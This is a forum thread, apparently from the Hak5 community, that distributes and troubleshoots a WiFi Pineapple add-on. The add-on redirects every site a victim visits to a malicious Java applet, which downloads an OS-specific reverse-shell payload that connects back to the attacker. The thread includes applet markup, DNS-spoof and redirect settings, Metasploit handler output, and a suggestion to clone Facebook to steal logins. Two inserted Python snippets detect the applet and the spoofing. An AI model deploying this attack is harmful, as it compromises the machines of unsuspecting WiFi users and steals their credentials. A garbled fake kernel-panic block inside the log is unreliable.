Pineapple Java Applet Attack!


reflex

Edit: Uploaded again to fix the run.html pointing to the comp rather than itself. Thanks Whistle Master.

EDIT: I'm such a noob, I uploaded the files but not the ones I'd been working on; the index.html was meant to be named run.html. Have renamed them and posted new link. Everything should be working fine now.

Hi Hak5 community, thought I would post this and give something back for once.

I've added an option to the MK3 Pineapple to redirect all websites to an Evil Java applet that has a payload for Windows, OSX, and Linux, which is selected depending on their OS (victim needs to have Java installed).

Screens

http://i.imgur.com/z5uHj.png

http://i.imgur.com/tgtGH.png

http://i.imgur.com/nM8KU.png

http://i.imgur.com/VUkJd.png

http://i.imgur.com/KWMfA.jpg

http://i.imgur.com/PWfrT.jpg

SETUP

1. Download and unzip "pineapple-java-applet-attack.7z" with the password "pineapple" from here http://www.mediafire.com/?5an6gg1byj23m9l

2. Copy all files from the "pineapple" folder to /www/pineapple/ replacing the index.php for an updated user interface with "Evil Java" option.

3. Copy the "java" folder to /www/

4. Click Conf next to the "Evil Java" option for commands to set up listeners.

5. Enable "Evil Java" and sit back.

ABOUT

All websites will be redirected to the Java Applet Attack when enabled (except for Google when using Chrome).

All payloads are set to connect back to 172.16.42.42 so make sure that's your IP.

Tested on the MK3 with WebUI version: 1.0.4 and Firmware version: 2.1.2

Have Fun ;)

Reflex!


Hi reflex!

Just a quick question: I had a look at the file run.html and I was wondering why the values of the Java applet are pointing to 172.16.42.42, which is the computer IP, instead of the pineapple IP 172.16.42.1, as the payloads are stored on it, no?

<applet width="1" height="1" id="Secure Java Applet" code="Java.class" archive="Signed_Update.jar">
<param name="WINDOWS" value="http://172.16.42.42:80/Qf8IYZJlKNMdl5">
<param name="STUFF" value="">
<param name="OSX" value="http://172.16.42.42:80/mac.bin">
<param name="LINUX" value="http://172.16.42.42:80/nix.bin">

Thanks !

Read the readme file. 172.16.42.42 has to be your IP and you have to click Conf to get the commands to set up the listeners. The payloads are on the pineapple. Set your IP to 172.16.42.42, then click Conf and copy-paste them into the terminal, then turn on Evil Java on the pineapple and all pages get redirected to the applet. If someone clicks run, the payload will connect back to 172.16.42.42.

I did read the instructions but the attack was not working correctly...

According to SEC blog:

The applet has to read the operating system specific payload path and the url of the next page to show from its parameters.

Then it will check on which platform it is currently running and start to download a specific payload using the browser it runs under.

With your run.html file, the applet cannot download the specific payloads from IP 172.16.42.42 (except if you are running a web server delivering the payloads) as they are on the pineapple 172.16.42.1 and in the folder /www/java/

I therefore modified your run.html to the following and it works perfectly:

<applet width="1" height="1" id="Secure Java Applet" code="Java.class" archive="Signed_Update.jar">
<param name="WINDOWS" value="http://172.16.42.1:80/java/Qf8IYZJlKNMdl5">
<param name="STUFF" value="">
<param name="OSX" value="http://172.16.42.1:80/java/mac.bin">
<param name="LINUX" value="http://172.16.42.1:80/java/nix.bin">

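Seen from the defending side, the run.html markup quoted in the post above has three traits a proxy or content filter can key on: a 1x1 applet, one download URL per operating system, and URLs that point at a private IP literal. The following is an added example, not code from the thread or from the package it discusses; the function names, the 2-pixel threshold and the set of OS parameter names are assumptions made for illustration.

```python
from html.parser import HTMLParser
from ipaddress import ip_address
from urllib.parse import urlparse

# Constructed sample: the <applet> markup quoted in the thread, closed with </applet>.
SAMPLE = """<applet width="1" height="1" id="Secure Java Applet" code="Java.class" archive="Signed_Update.jar">
<param name="WINDOWS" value="http://172.16.42.1:80/java/Qf8IYZJlKNMdl5">
<param name="STUFF" value="">
<param name="OSX" value="http://172.16.42.1:80/java/mac.bin">
<param name="LINUX" value="http://172.16.42.1:80/java/nix.bin">
</applet>"""

OS_PARAM_NAMES = {"WINDOWS", "OSX", "MAC", "LINUX"}  # assumption: names seen in this thread


class AppletCollector(HTMLParser):
    """Collects every <applet> element with its attributes and <param> values."""

    def __init__(self):
        super().__init__()
        self.applets = []
        self._open = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "applet":
            self._open = {"attrs": attrs, "params": {}}
            self.applets.append(self._open)
        elif tag == "param" and self._open is not None:
            self._open["params"][attrs.get("name") or ""] = attrs.get("value") or ""

    def handle_endtag(self, tag):
        if tag == "applet":
            self._open = None


def is_tiny(value):
    """True for a pixel dimension too small to be seen (2 px or less)."""
    try:
        return int(value) <= 2
    except (TypeError, ValueError):
        return False


def private_host(url):
    """Return the host if the URL uses a private IP literal, else None."""
    host = urlparse(url).hostname
    try:
        return host if host and ip_address(host).is_private else None
    except ValueError:  # a DNS name rather than an IP literal
        return None


def audit(html):
    """Return a list of (archive, reasons) for each suspicious applet in the page."""
    collector = AppletCollector()
    collector.feed(html)
    findings = []
    for applet in collector.applets:
        attrs, params = applet["attrs"], applet["params"]
        urls = {k: v for k, v in params.items()
                if v.lower().startswith(("http://", "https://"))}
        reasons = []
        if is_tiny(attrs.get("width")) and is_tiny(attrs.get("height")):
            reasons.append("invisible applet")
        per_os = sorted(k for k in urls if k.upper() in OS_PARAM_NAMES)
        if len(per_os) >= 2:
            reasons.append("per-OS download URLs: " + ", ".join(per_os))
        hosts = sorted({h for h in map(private_host, urls.values()) if h})
        if hosts:
            reasons.append("fetches from private address: " + ", ".join(hosts))
        if reasons:
            findings.append((attrs.get("archive", ""), reasons))
    return findings


if __name__ == "__main__":
    for archive, reasons in audit(SAMPLE):
        print(archive, "->", "; ".join(reasons))
```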

Hmm I must be doing something completely wrong here, as this doesn't seem to work for me at all. Here's my scenario:

Fresh reflash to 2.1.2

Run wp3.sh

Copy java to /www/ on the pineapple

Copy contents of pineapple/ to /www/pineapple, overwriting all

Browse to 172.16.42.1/pineapple

Start karma

Click Conf for java attack

Copy/paste windows attack into my BT5 terminal

Wait for it to load

Go back to mainpage for pineapple (Status)

Click "Start" for java attack

And...nothing happens. It goes to the Entropy Bunny page (having cake) and back to the index, but the Java Attack is still disabled. I then tried modifying run.html to Whistle Master's modification, and still nothing. What am I doing wrong here? Granted I'm just getting into msf, and know next to nothing about Java. Despite it saying Disabled, I tried connecting to the pineapple with my victim (that has java enabled) and going to various websites, but nothing appears in the msf on the attacker machine. Any help you can send this noob's way would certainly be appreciated. Thanks!

telot

You also have to start DNS Spoof for this attack.

The enable "Evil Java" action does the following:

- Change the DNS Spoof settings to redirect all sites to the pineapple;

- Change the landing page.

But you can do it manually:

Go to Configuration:

- Edit DNS Spoof Host to capture all hosts: 172.16.42.1 *

- Edit Landing Page (phishing) to change redirection: to content=“0;url=/java/run.html”

EDIT: I added a guide on the wiki

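The DNS Spoof Host entry `172.16.42.1 *` described above makes every hostname resolve to one address, which a client can check for before trusting a network. The following is an added example, not code from the thread or from the Pineapple firmware; the function names, the canary approach and the three-name threshold are assumptions, and the sample answers are constructed.

```python
import secrets
import socket
from ipaddress import ip_address


def make_canary():
    """A random hostname that should not exist, so a real resolver returns no answer."""
    return secrets.token_hex(12) + ".com"


def resolve(names):
    """Look names up with the system resolver; a failed lookup maps to []."""
    answers = {}
    for name in names:
        try:
            answers[name] = sorted(set(socket.gethostbyname_ex(name)[2]))
        except OSError:  # includes socket.gaierror (NXDOMAIN, timeout)
            answers[name] = []
    return answers


def assess(answers, canary):
    """Return the reasons the answers look like a catch-all DNS spoof ([] if none)."""
    reasons = []
    resolved = {n: frozenset(ips) for n, ips in answers.items() if ips}
    if canary in resolved:
        reasons.append("nonexistent canary name got an answer")
    real = {n: ips for n, ips in resolved.items() if n != canary}
    if len(real) >= 3 and len(set(real.values())) == 1:
        addrs = sorted(next(iter(real.values())))
        reasons.append("unrelated names all resolve to " + ", ".join(addrs))
        if all(ip_address(a).is_private for a in addrs):
            reasons.append("that address is private")
    return reasons


# Constructed samples. CANARY stands in for make_canary() so the result is repeatable.
CANARY = "3f9c1a7e5b2d4c6f8a0b1d2e.com"
SPOOFED = {  # what a client behind "172.16.42.1 *" would see
    "www.facebook.com": ["172.16.42.1"],
    "www.hak5.org": ["172.16.42.1"],
    "example.org": ["172.16.42.1"],
    CANARY: ["172.16.42.1"],
}
NORMAL = {  # documentation-range addresses, not real answers
    "www.facebook.com": ["192.0.2.10"],
    "www.hak5.org": ["198.51.100.7"],
    "example.org": ["203.0.113.5"],
    CANARY: [],
}

if __name__ == "__main__":
    print(assess(SPOOFED, CANARY))
    print(assess(NORMAL, CANARY))
    # Live check on the current network (needs DNS access):
    # c = make_canary()
    # print(assess(resolve(["www.facebook.com", "www.hak5.org", "example.org", c]), c))
```

A captive portal produces the same pattern until the user logs in, so a positive result means plain-HTTP content on that network should not be trusted, whatever the cause.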

The java option automatically starts DNS spoofing. It should create a file in the pineapple dir called up and echo the word "up" into it. That way the pineapple can tell when it's on. When you stop, it echoes "" into it, telling it it's off.

Check that the file up is in the pineapple dir and that it says up, using the "cat up" command, when you have started the Evil Java. Thanks to Whistle Master for noticing that in the run.html; have uploaded again and this time it should be fixed.

I think we need some consistency here with this new Java attack. There's lots of conflicting claims and none of them have been working for me. Anyone else having problems? I'm sure there's many ways to skin this cat. Reflex, since you discovered/initially designed this, could you do a once over on your instructions and fill in some gaps for us? Maybe I'm just a noob, but I'm having multiple issues and errors when trying to implement either solution (yours or Whistle Master's). Thanks for any help you can spare.

telot


Alrighty - sorry for the delay in my response, but I've been traveling the country and forgot my pineapple at home :(

Here is the output of the ls -la commands:

root@Pineapple:~# ls -la /www/ && ls -la /www/java/
drwxrwxr-x 1 root root 0 Jan 1 00:03 .
drwxr-xr-x 1 root root 0 Jan 1 00:02 ..
-rw-rw-r-- 1 root root 616 Jan 26 2012 error.php
-rw-rw-r-- 1 root root 106 Jan 1 00:07 index.php
drwxr-xr-x 2 root root 0 Jan 1 00:03 java
drwxrwxr-x 1 root root 0 Jan 1 00:04 pineapple
-rw-rw-r-- 1 root root 214 Jan 26 2012 redirect.php
drwxr-xr-x 2 root root 0 Jan 1 00:03 .
drwxrwxr-x 1 root root 0 Jan 1 00:03 ..
-rw-r--r-- 1 root root 73802 Jan 1 00:03 Qf8IYZJlKNMdl5
-rw-r--r-- 1 root root 4124 Jan 1 00:03 Signed_Update.jar
-rwxr-xr-x 1 root root 20800 Jan 1 00:03 mac.bin
-rw-r--r-- 1 root root 134 Jan 1 00:03 nix.bin
-rw-r--r-- 1 root root 14862 Jan 1 00:03 run.html

Looks about right by me. My DNS Spoof Host box under Configuration on the pineapple reads as follows:

172.16.42.1 *

My Landing Page, again under Configuration on the pineapple is as follows:

<html>
<head>
<meta http-equiv="REFRESH" content=“0;url=/java/run.html”>
</head>
<body>
</body>
</html>

I start karma and start DNS Spoof from the Status page of the pineapple. Then I download/unzip pineapplepwn.rc msf script and open a terminal and run msfconsole -r pineapplepwn.rc and here is the output:

root@root:~/Desktop# msfconsole -r pineapplepwn.rc
[-] Failed to connect to the database: FATAL: no pg_hba.conf entry for host "172.16.42.249", user "msf3", database "msf3"

Unable to handle kernel NULL pointer dereference at virtual address 0xd34db33f
EFLAGS: 00010046
eax: 00000001 ebx: f77c8c00 ecx: 00000000 edx: f77f0001
esi: 803bf014 edi: 8023c755 ebp: 80237f84 esp: 80237f60
ds: 0018 es: 0018 ss: 0018
Process Swapper (Pid: 0, process nr: 0, stackpage=80377000)

Code: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N4 00 00 00 00
Aiee, Killing Interrupt handler
Kernel panic: Attempted to kill the idle task!
In swapper task - not syncing

=[ metasploit v4.0.0-release [core:4.0 api:1.0]
+ -- --=[ 716 exploits - 361 auxiliary - 68 post
+ -- --=[ 226 payloads - 27 encoders - 8 nops
=[ svn r13462 updated 202 days ago (2011.08.01)

Warning: This copy of the Metasploit Framework was last updated 202 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
https://community.rapid7.com/docs/DOC-1306

resource (pineapplepwn.rc)> use multi/handler
resource (pineapplepwn.rc)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (pineapplepwn.rc)> set LHOST 172.16.42.42
LHOST => 172.16.42.42
resource (pineapplepwn.rc)> set LPORT 443
LPORT => 443
resource (pineapplepwn.rc)> set ExitOnSession false
ExitOnSession => false
resource (pineapplepwn.rc)> exploit -j
[*] Exploit running as background job.
resource (pineapplepwn.rc)> use multi/handler
resource (pineapplepwn.rc)> set PAYLOAD osx/x86/shell_reverse_tcp
PAYLOAD => osx/x86/shell_reverse_tcp
resource (pineapplepwn.rc)> set LHOST 172.16.42.42
LHOST => 172.16.42.42
resource (pineapplepwn.rc)> set LPORT 8080
LPORT => 8080
resource (pineapplepwn.rc)> set InitialAutoRunScript post/osx/gather/enum_osx
InitialAutoRunScript => post/osx/gather/enum_osx
resource (pineapplepwn.rc)> set ExitOnSession false
ExitOnSession => false
resource (pineapplepwn.rc)> exploit -j
[-] Handler failed to bind to 172.16.42.42:443
[*] Started reverse handler on 0.0.0.0:443
[*] Starting the payload handler...
[*] Exploit running as background job.
resource (pineapplepwn.rc)> use multi/handler
resource (pineapplepwn.rc)> set PAYLOAD linux/x86/shell/reverse_tcp
PAYLOAD => linux/x86/shell/reverse_tcp
resource (pineapplepwn.rc)> set LHOST 172.16.42.42
LHOST => 172.16.42.42
resource (pineapplepwn.rc)> set LPORT 8081
LPORT => 8081
resource (pineapplepwn.rc)> set ExitOnSession false
ExitOnSession => false
resource (pineapplepwn.rc)> exploit -j
[-] Handler failed to bind to 172.16.42.42:8080
[*] Started reverse handler on 0.0.0.0:8080
[*] Starting the payload handler...
[*] Exploit running as background job.
[-] Handler failed to bind to 172.16.42.42:8081
[*] Started reverse handler on 0.0.0.0:8081
[*] Starting the payload handler...
msf exploit(handler) >

Now as I've said before, I'm a total metasploit noob. I'm only on the second chapter of securitytube's megaprimer on it. But even as a noob this output does not look good. Many fatal exceptions and Failed to binds. Pressing forward regardless, I connect my target machine to its Karma'd pineapple AP of Caribou (a local coffee shop's wifi). Which by the way, Windows7 pops up with an "Additional log on information may be required" bubble. Ignoring this I open Firefox and browse to www.facebook.com and get a white page that says "No such file or directory" and in the address bar is www.facebook.com/java/run.html" (with that end quote). Not only that, but when my attacking machine tries to browse the internet, it goes to www.hak5.org/run/java.html" - so the DNS spoof spoofed the attacking machine's DNS as well?! This is the first time I've played with DNS spoof, so my noobery is again rearing its ugly head.

Is it a problem with DNS Spoof? Is it a problem with the msf script? Did I make some noob mistake? Most likely I'm sure :) Any ideas or further advice would be greatly appreciated. Thanks very much!

telot


You definitely have an issue with your metasploit install. Try to reinstall it and update it with the latest svn sources:

svn update

Secondly, regarding your "No such file or directory" problem, I think the problem is that the quotes in your landing page configuration are not the correct ones (” vs ")

Try to replace your landing page configuration with the following (with correct ones):

<html>
<head>
<meta http-equiv="REFRESH" content="0;url=/java/run.html">
</head>
<body>
</body>
</html>

Thank you for your response! I'm using the msf from BT5R1 live disk to get these results. I will update it and give it a shot and report back. Thanks Whistle Master.

telot


telot, did you ever get the disable problem fixed? If so, what fixed it? I'm having the same problem....

Nope - haven't gotten a chance to test it out till today. I will report my results this afternoon or tomorrow morning. I def want to get this working!!

telot


  • 3 weeks later...

Do you still need the extra script to run in metasploit?


Does anyone know if this will work on the pineapple mark iv?

The attack itself will work on mkiv, although the index.php file that is included in the package should not be uploaded.

Instead you can backup your existing index.php file in the pineapple folder before making any changes:

cp index.php index.bak

Open the one from the package above (MKIII), copy the following code and paste it into the php segment of your MKIV index.php file:

$isjavaup = exec("cat up");
if ($isjavaup != "") {
    echo "Evil Java is currently <font color=\"lime\"><b>enabled</b></font>. | <a href=\"stopjava.php\"><b>Stop</b></a><br />";
} else {
    echo "Evil Java is currently <font color=\"red\"><b>disabled</b></font>. | <a href=\"startjava.php\"><b>Start</b></a> | <a href=\"conf.php\"><b>Conf</b></a><br/>";
}

Reboot your pineapple, and you should see the Evil Java option.

Change your landing page to redirect to /java/run.html

So far on my tests, this has worked for me, with access to metasploit working.

The only thing is, the switch status (on/off) does not work

I hope that helps, but I'm a metasploit newbie myself!


Why can't it be uploaded? I replaced mine but made a back up and now I have the mark III interface with all the amazing goodness of urlsnarf, ngrep on the status page ui. I just edited the file where it said mark3 to Mark IV for a little personal touch ;D glad to know your on/off button isn't working either. However when I connect to my pineapple wifi and log into a site it does show a java box but need to look into it more. I'm thinking it's running but there's an issue with the switch showing "on"? Question I have though for the guys at hak5 is why was the mark 3 interface replaced with the current mark IV? Was it a time issue or something? I quite like the old interface with the easy to read display of various items (i.e. airmon-ng, urlsnarf, arp).

I think ngrep and urlsnarf aren't 100% functional on MKIV.

(Sebkinne says: ngrep is not installed currently)

(Thought so: :) )

I think it's on the list to fix for the next release of firmware, if I'm right.

see this thread: MKIV - What we know and don't know

Projects on the collective to do list and issues that need attending:

Network Pineapple Monkey - Seb has acknowledged it's on his list and will become higher priority after 1.0.1 firmware is released. See this thread:

Adding Alfa AWUS036H to the Mark4: Darren commented: "...adding a 2nd WiFi Adapter, say with an AWUS036H, seems as likely as adding 3G -- so tethering is on the table." Official current status on getting it to work is unknown. During my trials, the Mark4 recognizes the realtek rtl8187 but does not assign it as a wlan adapter. Openwrt should have support for it through kmod-rtl8187

Combining storage and 3G connectivity in one card: "Two birds, one stone". Many 3G usb cards have microSD slots. Novatel U760 is a prime example. Darren and hfam both have these cards and seem to be working on it.

Ngrep is gone now and accessible only via SSH. (See: http://hak5.org/tag/ngrep for information on how to ngrep via terminal)(Sebkinne edit: It is gone. Dead. For now )

URLsnarf is missing from the UI page, but is also accessible via SSH. Darren's comment on the matter: "We're working on a revised web UI for sniffing which should bring together the power of urlsnarf, ngrep and *ettercap" Swoot!

Reaver is not present on Schmoocon version but will be via firmware update 1.0.1.

Reaver has not yet been proven to work - a proper how to guide is needed. Issue lies with mon.wlan0 - what is it used for? Can we remove it and add a proper mon0? Do we need to? Will it affect Karma as I suspect? (I'm going to try my hand at it today!)

Further 3G Dongle research - Darren's hints for us regarding 3G dongles: "Usually it's just a matter of "ejecting" the USB CD-ROM so that the modem reveals itself, at which point a bunch of uci network commands set the config, pppd does its thing with chat and comgt." - Need to clarify ejecting the usb cd-rom...

Add support for encrypting USB drives using EncryptingFS or perhaps even truecrypt?

Enable airdrop-ng support by installing python and other dependencies to usb drive

telot


However when I connect to my pineapple wifi and log into a site it does show a java box but need to look into it more. I'm thinking it's running but there's an issue with the switch showing "on"?

DNS Spoof is running and you have the run.html offering up a java attack applet. It will run constantly; you can't turn it off without replacing the redirected page. If you really wanted to, you could try altering an existing web page to inject the java code for the user instead of a blank page.

For example, clone www.facebook.com and insert the code into the webpage.

That way, when your victim machine browses to the infected page the script is run automatically and they are not sitting looking at a blank screen.

Also a particularly nasty attack would be to disguise the attack vector as one of the many popular FB games.

With an active internet connection to the pineapple, the victim will continue on his/her way to the login page, and you get the chance to steal passwords as well.

These are some of the theoretical situations I am trying to defend against. (I am trying to write a term paper for college on MITM attacks)
